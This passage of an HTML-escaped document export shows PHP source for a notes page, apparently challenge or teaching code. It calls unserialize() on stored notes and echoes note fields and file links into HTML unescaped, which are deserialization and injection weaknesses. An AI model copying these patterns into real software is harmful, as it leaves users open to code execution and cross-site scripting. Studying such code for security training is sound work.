style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;$user &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $_SESSION[&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'user'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;];&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;$user &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;mysql_real_escape_string&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($user);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;$DB&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;execute(&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;select data from notes where username=\&quot;${user}\&quot;&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;$notes &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $DB&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;fetch_all();&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;foreach&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($notes &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;as&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $note)&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$note &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;unserialize&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($note);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;echo&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;&amp;lt;br&amp;gt;&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$letter &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $note&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;letter;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$info &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $note&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;resolve_file();&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;echo&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;&amp;lt;div class=\&quot;container\&quot;&amp;gt;&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;echo&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;&amp;lt;blockquote&amp;gt;&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;echo&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;&amp;lt;p&amp;gt;${letter}&amp;lt;/p&amp;gt;&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;isset&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($info))&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$path &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $info[1];&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$name &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $info[0];&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;echo&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;&amp;lt;footer&amp;gt;Attached file: &amp;lt;cite title=\&quot;Source Title\&quot;&amp;gt;&amp;lt;a href=\&quot;&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;$path&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;\&quot; download=\&quot;&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;$name&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;\&quot;&amp;gt;file&amp;lt;/a&amp;gt;&amp;lt;/cite&amp;gt;&amp;lt;/footer&amp;gt;&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;else&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;echo&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;&amp;lt;footer&amp;gt;Attached file: None&amp;lt;/footer&amp;gt;&quot;&lt;/span&gt;&lt;span 